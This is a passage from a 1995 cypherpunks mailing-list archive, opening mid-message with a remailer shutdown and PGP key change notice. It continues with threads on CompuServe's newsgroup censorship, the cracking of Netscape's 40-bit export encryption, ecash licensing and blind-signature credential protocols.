"remailer@ideath.goldenbear.com". Mail to the goldenbear.com domain has been bou
for almost three weeks now, and I expect that to continue. Sorry for any inconve
I predict about a year of erratic net access and moving around while I finish la
school, take the bar exam(s), and find a job or get a business started. When eve
settles down I plan to find a reliable net connection and run a remailer again. 

Due to the loss of my domain name and UUCP connectivity, other changes are happe

I'm now using a Windows box, not a Unix box, for my net access; have switched to
for DOS and Private Idaho (nice job, Joel!).

Am also using a new PGP key, since my old one (0x58ddf30d) was almost 3 years ol
updated the MIT PGP keyserver with an "obsolete" marker for the old key, as well
new key (signed by my old key). The new key is appended to this message.

Am using a new long-term E-mail address, "gbroiles@netbox.com". Re my discussion
weeks ago of alternatives for mail storage/forwarding, I have settled on netbox.
can receive mail as "gbroiles@darkwing.uoregon.edu" but I expect that address to
working sometime this coming May. The netbox.com address will ideally keep worki
years to come.

- --
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMOPafv37pMWUJFlhAQGnhAf/XrHe38eww+sMf0/mmqKFzT9xX9USCCBO
5yMteRAmAsEiiTo8TPcRPlB6eKqCrCiJJqDMfxm3UaWhhqBilRhQoB8BqdCvjTLY
87/HsHKV3Iv4IPvud+ojk9GEXwUf204U9m/CgVF17HKO+XTCK5GVN7gmsqWWxsLr
a5gNccpentcFiy0KJVUWfLguOXA20I+nGnkZjMBK/RAPotBg4gezE2jqjbYyQ1rC
y0SLX843ufEfRaePC1X8IyWH32gqiyrW5rZuTo8B2usbR96Y2VXXX6Oprrd5CD38
AuUhjkOXVEsCFVP5bt6uQbM81Uhvxc1mFYHYKKJyuWPWo5E6tBwXZA==
=Heo3
-----END PGP SIGNATURE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAy8+sdEAAAEH/2YvMvdRxoxAIpNp1W88EGq4EMOVhpucjGjZByoJATpDoU+x
sqZl6lwzWh7yhHbLfuUZhWZVhLlLGxOAcHkZ3o6Tao+T/qCLKUnyFtw3Q/Wpzfiw
YIGbXkbKvSaI7U3PTMHraimiZNAW/QAhIuLanVEkl/rko/aIdvyIfOJSFHW9Bjml
ArZmyrsT8PiA+Eiqa+JyRv/JnWiJJ00FYHhG1GkcAvBovQJxxLzqq9PcB8nVlVfS
t4aV2z1OfmjXHq4pgUye6CwdjzXnMz3e70FT1erkoP+/iC56iSkb/4J67y8NnKgq
RNQ8lt+X2+vnq3Fa8r8EhhqZFZcV/fukxZQkWWEABRG0IkdyZWcgQnJvaWxlcyA8
Z2Jyb2lsZXNAbmV0Ym94LmNvbT60KUdyZWcgQnJvaWxlcyA8Z3JlZ0BpZGVhdGgu
Z29sZGVuYmVhci5jb20+iQCVAwUQLz8tYn3YhjZY3fMNAQGOkwP/cYeYdbTj9H0C
BVI9nw70avUIGYUWT1HdQaK6YqdOvV4Eg56rpKdFEFlwUdOBg8MbuFaLMbbAnKxH
EvGsQBtu0N1kyIebMAuEniT/22yVlVGHHS+uGxyBKq1i7Nv5uRXl2WSdQDUCHN0W
9YAzReRI1F6ExnVXJHuHo4EY7lQ3P94=
=yJO8
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 29 Dec 1995 23:08:37 +0800
To: cypherpunks@toad.com
Subject: Re: ideath remailer permanently down / PGP key changes for Greg Broiles
Message-ID: <199512291247.EAA05290@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain



Doh, the wordwrap on that message was ugly. Sorry. Gotta spend some more
time making friends with Private Idaho. 

Short version: remailer@ideath.goldenbear.com is gone forever, sorry. All
mail to anything @goldenbear.com is bouncing. Mail for me should be sent to
"gbroiles@netbox.com", effective immediately. I have distributed a new PGP
key to the keyservers and marked my old key obsolete. I will be signing list
messages again once I get that wordwrap thing fixed. 

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 29 Dec 1995 23:06:37 +0800
To: cypherpunks@toad.com
Subject: CAV_ein
Message-ID: <199512291234.HAA01062@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-29-95. NYPaper: John Markoff page-ones Compuserve's
   cave-in to Reich sex law and the alt free-screeching for
   sex home censorship cave-in to rutting parents ashamed.

   CAV_ein







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Fri, 29 Dec 1995 23:46:58 +0800
To: cypherpunks@toad.com
Subject: Netscape 40-bit cracking. The new computing benchmark?
Message-ID: <Pine.BSD/.3.91.951229084345.18726A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Infoworld Dec 25, 1995 page 3.

Netscape Commerce Server Security Broken

Integrated Computing Engines Inc. (ICE), in Cambridge, Mass. announced it 
has cracked the 40-bit DES [huh? not RC4] encryption in the Netscape 
Commerce Server.  Unlike a similar security break-in [talk about bad 
terminology] by a French university student last August, which required 
eight days, 120 workstations, and two supercomputers, ICE said it used a 
computer that cost $83,000 and compromised the Wold Wide Web server's 
security in 7.7 days. [Hey, what about the Cypherpunks crack that 
only took 31.8 hours?] Netscape Communications Corp. officials were not 
surprised by the security crack. "We've known that 40-bit encryption is 
breakable since we shipped the server.  That's the reason it's allowed to 
be exported," said company spokeswoman Rosanne Siino. "We need to keep 
lobbying to get rid of the U.S. governments 40-bit restriction on what 
can be exported."  Within the United States, Netscape sells products with 
128-bit encryption.



      Weld Pond   -  weld@l0pht.com   -        http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 30 Dec 1995 07:02:46 +0800
To: cypherpunks@toad.com
Subject: Re: Ecash graphic images?
Message-ID: <v02120d0aad09dc07f243@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:58 12/28/95, anonymous-remailer@shell.portal.com wrote:
>Could anyone provide some pointers to a gif or jpeg file containing
>good-looking ecash coins?  I would like something larger and more
>detailed than the "we accept ecash" you see everywhere.  Thanks very
>much.

Try http://www.delorie.com/gif/signs/


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 30 Dec 1995 05:30:43 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <199512291548.KAA19627@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 28, 1995 23:30:19, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
 
> 
>I see a positive longterm trend toward people connecting through smaller, 
>more local services. 
> 
 
Quite correct. 
 
Not only does the internet radically change (at least perceptions) of space
and time, it also is producing serious disequilibriums of scale in
economics. 
 
Economy of scale states that until a farily high limit is reached, bigger
enterprises tend to produce goods that are less expensive than those
produced by smaller enterprises. Specialized handicraft production aside,
the goods produced in larger enterprises also tend to be of higher quality.

 
The disequilibrium here began with the development of the microprocessor as
we see from the shift to the old centralized IBM iron to the microcomputers
we're using today. Ditto certain aspects of network switching. Ditto DES
moved from centralized hardware to decentralized software. 
 
We're seeing a growing dystopian world where national entities and
non-governmental organizations all seek to enforce their particular
cultural/political/economic/etc. biases on the global internet. I believe
this process will continue for some period of time. 
 
At the same time we may (and I think likely will) see aspects of the net
broken down into widely geographically separated locations that
simultaneously have no more effect on end users than the floor at the
central library on which the book we want resides. E.G. we'll use Denmark
to get "alt.sex.granny.gum-jobs," ftp to Singapore for
"/warez/microsoft/win99/hack/" and to the Turcos Islands for
"data.finance.internal.morgan." 
 
We'll have all three open and on our monitor at the same time, passed
through an second-level ISP in some small country that decides there's
money in switching and will no more regulate data throughput than they
would try to hold hotel keepers responsible for the content of the phone
calls made by their tenants. 
 
     --tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Sat, 30 Dec 1995 06:17:54 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring"
Message-ID: <v01530500ad09cf23590b@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


This is a resend of a reply to Tim May's message on the CI$/Bundsweiser
Republic/alt.nekkid.hitler.youth controversy. The Cypherpunks mailer didn't
enjoy my attempts at humor in the headers...


------------

Tim May wrote:

>At 4:52 PM 12/28/95, Cees de Groot wrote, speaking of Compuserve's recent
>dropping of many newsgroups in response to demands by German prosecutors:
>
>>I won't start to comment on the style of this message. The term "Suitspeak"
>>comes to mind.
>
>Perhaps it is "Suitspeak," but it is not "censorship."
>
>Or, more precisely, it is fear that government laws will be used to
>sanction the service.  Thus, it is the government of Germany in this case
>which is "censoring." ("Censor" and "censorship" are notoriously overloaded
>terms, of course.)

It's a political problem.

This demonstates the basic problem with tollerating monopolies in this
industry. When governments interfere, everyone subscribing loses, which
means most of the people in the audience for the service loses.

Unfortunately, there are no technological fixes (in the short term) for
monopolies. The shumpeterian cycle is too long for the time horizons
engendered by the German government's actions or the Exon/Gorton/Hyde
language. You have to fight monopolies on the political arena as well as
the technical (remember how the WWW was going to liberate all of us on it's
own? Until the elites recognized people wouldn't be watching Microsoft ads
*conspiratorial wink*.)

If I were a compuserve user, complain to your nearest German consulate and
call your congresscritter. Those GOP types will have a field day condeming
"euro-data-imperialism" during special order speeches on C-SPAN.

Support your local ISP.

Bill Humphries

PS: If only the Germans worried about Nazis during the Nurmemberg trials
the way they worry now, maybe they wouldn't be facing their current plauge
of nativist/skinhead problems.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 30 Dec 1995 06:17:55 +0800
To: cypherpunks@toad.com
Subject: (fwd) DigiCash licencing?
Message-ID: <v02120d02ad09c4936a9f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Organization: Digiturg
Date: Fri, 29 Dec 1995 17:32:10 +0200 (EET)
From: Jyri Kaljundi <jk@digit.ee>
To: ecash@digicash.com
Subject: DigiCash licencing
Mime-Version: 1.0
Sender: owner-ecash@digicash.com
Precedence: bulk
Reply-To: ecash@digicash.com


Does anyone know about the terms and costs of licencing ecash software? I
have tried contacting DigiCash directly with these questions, but have
got no answers :(

And who and where are already implemeting ecash? Mark Twain Bank and
Swedish post are two I know of, what about the others?

Our company is very interested in using ecash here in Estonia, but
somehow DigiCash does not seem to allow that.

With all the best,

Juri Kaljundi, managing director, DigiMarket
jk@digit.ee

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 30 Dec 1995 06:51:13 +0800
To: "David E. Smith" <dsmith@midwest.net>
Subject: Re: Proxy/Representation?
In-Reply-To: <199512290017.SAA00619@cdale1.midwest.net>
Message-ID: <199512291752.MAA11504@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"David E. Smith" writes:
>That's more of what I was looking for.  I suppose that (I'm still using
>PGP as my example) there could be a shared PGP key, signed by Helen and
>myself, where only the two of us know the passphrase, with a keyid of
>"David Smith <dsmith@midwest.net> on behalf of Helen Jones <helen@devnull.org>"
>or something similar.  The obvious problem is that in sharing the pass
>phrase the security is weakened.  (Paranoid threat model: at some point
>we have to decide on the pass phrase, and we are videotaped/bugged/spied
>upon while this takes place.)

Why bother with the shared key?  You need a message from Helen describing
the powers with which you are invested, signed by her key.  The wonderful
thing about data is that copying it is virtually free.  When you issue an 
order on her behalf, include a copy of the signed PoA, and sign the whole
thing with your key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 30 Dec 1995 07:12:24 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: blind validation
In-Reply-To: <199512290144.RAA28654@jobe.shell.portal.com>
Message-ID: <199512291816.MAA09405@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Chaum's way around it was basically to have some mechanism to give
> each person a unique number of some special form.  There doesn't have
> to be any agency who knows what number each person has (in fact, there
> isn't, in his scheme), but there is a mechanism to assure that one
> person does not get two numbers.  This is sometimes loosely referred to
> as an "is-a-person" credential (although in this specific context it is
> not actually a credential, just an identifier).

If I understand you correctly, this protcol allows Alice to create one and
only one nym that can't be connected to her real identity.  All of 
Alice's transactions can be linked together and to that nym, but there's 
no way to tag Alice with them.

The main difficulty I see with this protocol is that if things go wrong,
they go very wrong.  If Alice slips up once, or if she's compelled to give
herself up, then she loses everything and gets tagged with all of her
transactions.

Does anyone have a pointer to Chaum's paper?

[...]

> So the result in effect is to make it difficult to give away just a
> validation, without also giving away the ability to act as you.  Here
> is an idea about another way to achieve the same thing, closer to
> Alex's example:  Alice gets a blind validation as Alex describes based
> on a simple blind signature.  (Alice hands a blinded number to Bob, he
> signs it, Alice unblinds it, and uses the resulting signed number as
> the validation to, say, access Bob's files.)  We add that Alice puts,
> say, $100 into "escrow", encrypting it with the secret number and
> putting it on some public server.  She proves to Bob that she has done
> this using cut and choose.
> 
> Now if Alice gives away her secret number, anyone using it will be able
> to access Bob's files, but they can also get the $100.  So now it costs
> something for Alice to give away her secret.
> 
> (There are some major problems with this idea, the worst being that Alice
> can extract and spend the $100 right after proving to Bob that she is
> doing what she said, and before publishing her number.  Maybe someone
> could think of some fixes.)

This is a good idea because it addresses one of the big problems with my
protocol, the impossibility of introducing latency. 

But apart from the problem you mentioned above, isn't there a problem with
setting the escrow amount?  Ordinarily, we'd want to set the amount just 
high enough so that Alice doesn't have any interest in cheating.  
Whatever benefit Alice gains will be offset by the penalty.

How do we put a numeric value on the benefits Alice gets from cheating? 
Don't we create a situation in which a rich guy might be perfectly
comfortable with the risk of losing the money, while someone else might
not?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 30 Dec 1995 07:23:11 +0800
To: cypherpunks@toad.com
Subject: Re: HRB Systems Data Storage Encryptor
Message-ID: <9512291814.AA29382@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald wrote:
> At 09:45 AM 12/26/95 +0100, Anonymous wrote:
> >Check out http://www.hrb.com/encryption/ssp.html, your
> >exclusive source of the Ultron Crypto-Engine (tm)
> 
> The web page proudly announces:
>   "is the only NSA-approved Type I data encryptor available today."
> 
> There are probably some people ignorant enough to regard that as
> a recommendation.
>James A. Donald

     What's the problem? If you're a contractor or agency looking to store
classified data, the NSA approval is essential. There's no pretence in
the ad that the NSA can't read it. It says:

"NSA provides necessary keying material for SSP3110 operation."

and 

"It is available to U.S. Government agencies, military organizations, 
 and defense contractors."

This is not a snake oil product ala "Power One Time Pad" (sic). It's
a real system, approved for use with classified data. I strongly doubt
that there are any known holes (with the NSA supplying the key material,
why should there be?)

Speaking for myself,
	Peter Trei
	trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 30 Dec 1995 07:36:16 +0800
To: vznuri@netcom.com
Subject: Re: another anonymous poster helping to destroy our rights
Message-ID: <01HZDR1AL5S48Y55Y6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 28-DEC-1995 01:36:46.58

>= the list charter can ask for people to submit to various practices on
the honor system, such as not using pseudonyms. cryptoanarchists who
hate the idea of trust are of course going to object to the honor system,
because "that which cannot be enforced should not be prohibited".
----------------
	Does this last idea leave much doubt in anyone's mind that "Vladimir Z.
Nuri" is a Detweiler tentacle?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 30 Dec 1995 08:21:40 +0800
To: cypherpunks@toad.com
Subject: Re: CAV_ein
In-Reply-To: <199512291605.LAA15428@pipe4.nyc.pipeline.com>
Message-ID: <0T6DkDvcwapi@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ kudos once again to John Young for making the NYT material available]


>    The New York Times, December 29, 1995, pp. A1, D4.
> 
>    On-Line Service Blocks Access To Topics Called Pornographic
> 
>       Complaint by Germany Has Worldwide Impact
> 
>    By John Markoff

[big snip]

>    "In the future, every Internet operator will be subject to
>    local laws," said Eric Schmidt, chief technology officer
>    for Sun Microsystems Inc., a Mountain View, Calif.,
>    computer maker. "And software will be developed to provide
>    the appropriate local censorship."

Ick.  There's some truth in the first quoted sentence, but I fail to see
any censorship as "appropriate".  Does Mr. Schmidt swing much weight in
Sun's policy department?
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMORMg2Cl9Uka85MxAQErqgf/Wx/Ai7EUSv1QpipAAtsEDLbos/aH+INT
mA8+hF6PIyONHjwxsz24L5+c7ZcmiwshmH4pJpI/l1b9H9Wz/O/aKG+QqOr7hTtY
By/yU2M5s9y7ZJ1rn4coasx/J4ar/SNLgxFNPV+buL5v3UFLzmmUwWzryCH6pIkB
5PShfQ1BqD7MI4juwKjWGw+fgZraJfScb2zKYk01E6brFPObNGdMAZ0P8lFqtkub
VdYyAneCtc+F6xeU5lRSGhysJWE+PwkwgKKhQX6h1zwMlhLQXX5t1kSnsezzqPzZ
/C+Bgt2BGQYPoDH9Gpc8GXQENpDRx3Lh8dhlNDlNAEDxKva03Ij30A==
=RLCm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 30 Dec 1995 07:47:23 +0800
To: cypherpunks@toad.com
Subject: "Cybercrime" Article from Reuters
Message-ID: <01HZDS4NA1PC8Y55Y6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Most of what they claim to be looking for is stuff that most people
won't object to their countering. Still, if anyone spots a government agency
offering an "informant" email address, posting it so that we can send them lots
of stuff (i.e., all the "Make Money Fast" pyramid schemes) would seem to be a
good thing to do... it should occupy them so that they're doing things that are
useful.
	Cypherpunks relevance? Well, there is the mention of anonymnity.
	-Allen

Reuters New Media
   
   _ Thursday December 28 6:31 AM EST _
   
Authorities Patrolling Cyberspace for Crime

   WASHINGTON (Reuter) - Crime on the Internet is now more than just
   dirty pictures.
   
   With millions of people and a fast-growing commercial presence in
   cyberspace, federal law enforcement authorities are struggling to
   crack down on wrongdoing in the new territory.
   
   They are hunting for bogus get-rich-quick schemes, weight-loss
   miracles, AIDS cures, credit-repair programs, investment scams and
   gambling. That's in addition to crimes such as trafficking in child
   pornography.
   
   ``The scams are the same. The way you investigate them is different,''
   said Lucy Morris, assistant director for credit practices at the
   Federal Trade Commission, which has staff attorneys monitoring the
   Internet.
   
   Just as they would on the street, these ``cybercops'' act on tips or
   they just patrol. The potential crime scenes are the Internet
   worldwide computer network, computer online services such as America
   Online and smaller computer bulletin boards.
   
   Cruising cyberspace as part of their work are employees with the FTC,
   the Securities and Exchange Commission, the Department of
   Transportation, the Secret Service, state attorneys general and state
   securities regulators.
   
   They can work at the office or from home.
   
   ``In some respects it's easier to find the violations because you
   don't have to leave the office,'' said Minnesota Deputy Attorney
   General Tom Pursell.
   
   But there are obstacles.
   
   Cyberspace offers criminals wonderful anonymity and law officers face
   ambiguous jurisdiction issues due to the global nature of the
   Internet, raising questions about whether new laws are needed to cope
   with the new medium.
   
   ``Now all you need is a computer, a telephone, a little bit of
   software, and you're in business,'' said Hubert Humphrey III, the
   attorney general of Minnesota who himself prowls cyberspace in search
   of wrongdoing.
   
   Authorities agree they have their work cut out. ``It's going to be
   very difficult,'' predicted Humphrey, whose state has been out front
   in tracking down wrongdoing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 29 Dec 1995 23:14:16 +0800
To: cypherpunks@toad.com
Subject: Chinese Cypherpunk quote  [NOISE]
Message-ID: <199512291320.OAA23382@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I see that some rants here are rubbing off on the folks who write
chinese fortune cookies, In tonites dinner, The cookie said:

The will of the people is the best law.

I wonder if we can get a couple thousand cookies sent to 
Congress with that message?

A.E.N.

or to T.C.M.....

Xmas_Troll





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 30 Dec 1995 07:51:53 +0800
To: cypherpunks@toad.com
Subject: Telecom Bill Rewrite
Message-ID: <01HZDSQB7MJ48Y55Y6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It looks like some political pressure will still be possible.
Definitely good news, especially since most of the methods for receiving
"banned groups" listed in the FAQ are through US sites.
	-Allen
 
   Reuters New Media
   
   _ Friday December 29 5:51 AM EST _
   
Dole, Gingrich Unhappy with Telecom Bill
   
   WASHINGTON (Reuter) - Top House and Senate Republican leaders
   expressed unhappiness Thursday with a proposed rewrite of the nation's
   communications laws amid signs the Republicans may seek changes in
   legislation circulating on Capitol Hill.
   
   ``There are a number of problems in the bill that could have been
   resolved in a different way,'' Senate Majority Leader Robert Dole told
   a news conference.
   
   The Kansas Republican, appearing with House Speaker Newt Gingrich,
   said there are ``three, or four, or five provisions'' GOP leaders
   ought to focus on, including what he described as a ``giveway'' of a
   key part of the airwaves to broadcasters.
   
   The plan worked out by congressional negotiators proposes that in the
   future, when the government doles out licenses for high-definition
   digital TV, the Federal Communications Commission ``should'' limit
   eligibility to existing broadcasters.
   
   Critics have charged this would amount to a multibillion dollar
   giveaway of the airwaves to the broadcast industry and that the
   government could instead raise as much as $70 billion through a
   competitive auction of the digital spectrum.
   
   Last week it appeared the White House and congressional leaders had
   reached agreement on legislation to overhaul the 61-year-old
   communications laws, following weeks of work by House and Senate
   negotiators.
   
   The plan would tear down decades-old laws and permit telephone, cable
   and broadcast companies to invade each other's turf.
   
   But after Vice President Al Gore and some congressional leaders said
   they had achieved an accord, other Republicans began to balk at the
   proposal, saying no deal had been struck.
   
   The protests scuttled any chance the telecommunications bill would be
   completed this year.
   
   Among other things, Republicans expressed dissatisfaction with
   provisions to ease restrictions on the number of TV stations
   broadcasters could own, saying the plan did not go far enough.
   
   They also cited issues such as regulation of the Internet and a
   decision to drop language permitting greater foreign investment in
   telecommunications.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 30 Dec 1995 08:25:58 +0800
To: cypherpunks@toad.com
Subject: Massey, CEO of Compuserve, on Internet
Message-ID: <ad099b2f180210046cfa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
explaining how his company is "taking the high road by complying with the
laws of Germany" in removing access to 200 Usenet groups.

So, what happens with Saudi Arabia announces that Christian and Jewish
newsgroups violate their laws (I don't know this for sure, but I know that
Jewish and Christian temples and churches are strictly verboten in Saudi
Arabia).

And, think of the many countries which ban homosexuality, and so on.

An amazing cave. Massey seems to think that all of the other large ISPs
will fall in line and remove "illegal" newsgroups (illegal in any country
in which they have account holders).

I wrote a longer post on the issues last night, so I won't repeat those points.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Johnson second login <exabyte!mikej2@uunet.uu.net>
Date: Sat, 30 Dec 1995 15:53:34 +0800
To: Scott Brickner <gedora!uunet!universe.digex.net!sjb@uunet.uu.net>
Subject: Re: DOS - MD5 - Thanks
In-Reply-To: <199512282039.PAA21627@universe.digex.net>
Message-ID: <Pine.3.89.9512291505.C2697-0100000@gedora>
MIME-Version: 1.0
Content-Type: text/plain




A freestanding implementation of MD5SUM (compiled from that in the PGP 
distribution) for DOS is at
ftp://ftp.csn.net/mpj/public/md5sum.zip and on the Colorado Catacombs BBS 
at 303-772-1062.

I suggested to Phil Zimmermann that he should put this in the next PGP 
release along with the compiled DOS version of PGP, but there hasn't been 
a new release of PGP since then.

Happy New Year!
Mike Johnson
mpj@exabyte.com

#include <std_disclaimer.h>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 30 Dec 1995 09:01:36 +0800
To: cypherpunks@toad.com
Subject: CHU_chu   Search Engines, Branded Communities
Message-ID: <199512292107.QAA02245@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-29-95. FinTimes:

   "Engine of the superhighway" muses on search engines and 
   branded communities, and how their convergence will 
   barb-wire lecher Tio Web from wild-legger Tia Juana.

   CHU_chu













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Sat, 30 Dec 1995 09:23:23 +0800
To: cypherpunks@toad.com
Subject: Re: Chinese Cypherpunk quote  [NOISE]
Message-ID: <199512300011.QAA16526@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 12/29/95 +0100, Anonymous wrote:
>The will of the people is the best law.

Rrrr. Rrrrr... OKAY, I'm sure that's bait, but it's a (relatively) slow week
here at Netscapegoat. (Besides, I've apparently already set a precedent for
responding to tentacularly dangled carrots earlier this week with my
response to the C'punk Seal question.) So I'm throwing better judgment to
the wind and leaping straight for the soft pink throat of this taunt.

To reply simply: Wrong -- the will of the people is as fickle as the wind.
Follow the will of the people, and you run your country by following fads.
Mob rule and all that. We're in deep trouble if we ever get a true democracy. 

Sorry. Just had to respond.

--
MY opinions, thank you very much. 

Corey Bridges
Netscape Communications Corporation
home.netscape.com/people/corey

Action figure #35: "Jeff Weinstein, with real asbestos suit and
glow-in-the-dark magnetized target!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 30 Dec 1995 09:55:01 +0800
To: Weld Pond <weld@l0pht.com>
Subject: Re: Netscape 40-bit cracking. The new computing benchmark?
In-Reply-To: <Pine.BSD/.3.91.951229084345.18726A-100000@l0pht.com>
Message-ID: <30E488F1.1F51@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Weld Pond wrote:

  They (ICE) say that they actually ran Hal's SSL challenge.  I think
the mention of DES must have been an error on the part of Infoworld.

	--Jeff

> 
> From Infoworld Dec 25, 1995 page 3.
> 
> Netscape Commerce Server Security Broken
> 
> Integrated Computing Engines Inc. (ICE), in Cambridge, Mass. announced it
> has cracked the 40-bit DES [huh? not RC4] encryption in the Netscape
> Commerce Server.  Unlike a similar security break-in [talk about bad
> terminology] by a French university student last August, which required
> eight days, 120 workstations, and two supercomputers, ICE said it used a
> computer that cost $83,000 and compromised the Wold Wide Web server's
> security in 7.7 days. [Hey, what about the Cypherpunks crack that
> only took 31.8 hours?] Netscape Communications Corp. officials were not
> surprised by the security crack. "We've known that 40-bit encryption is
> breakable since we shipped the server.  That's the reason it's allowed to
> be exported," said company spokeswoman Rosanne Siino. "We need to keep
> lobbying to get rid of the U.S. governments 40-bit restriction on what
> can be exported."  Within the United States, Netscape sells products with
> 128-bit encryption.

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 30 Dec 1995 10:45:37 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Netscape 40-bit cracking. The new computing benchmark?
In-Reply-To: <30E488F1.1F51@netscape.com>
Message-ID: <199512300151.RAA00995@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


ObPlug: Community ConneXion does not ship a 40-bit-crippled
server. (Apache-SSL)

> > surprised by the security crack. "We've known that 40-bit encryption is
> > breakable since we shipped the server.  That's the reason it's allowed to
> > be exported," said company spokeswoman Rosanne Siino. "We need to keep

-- 
sameer						Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
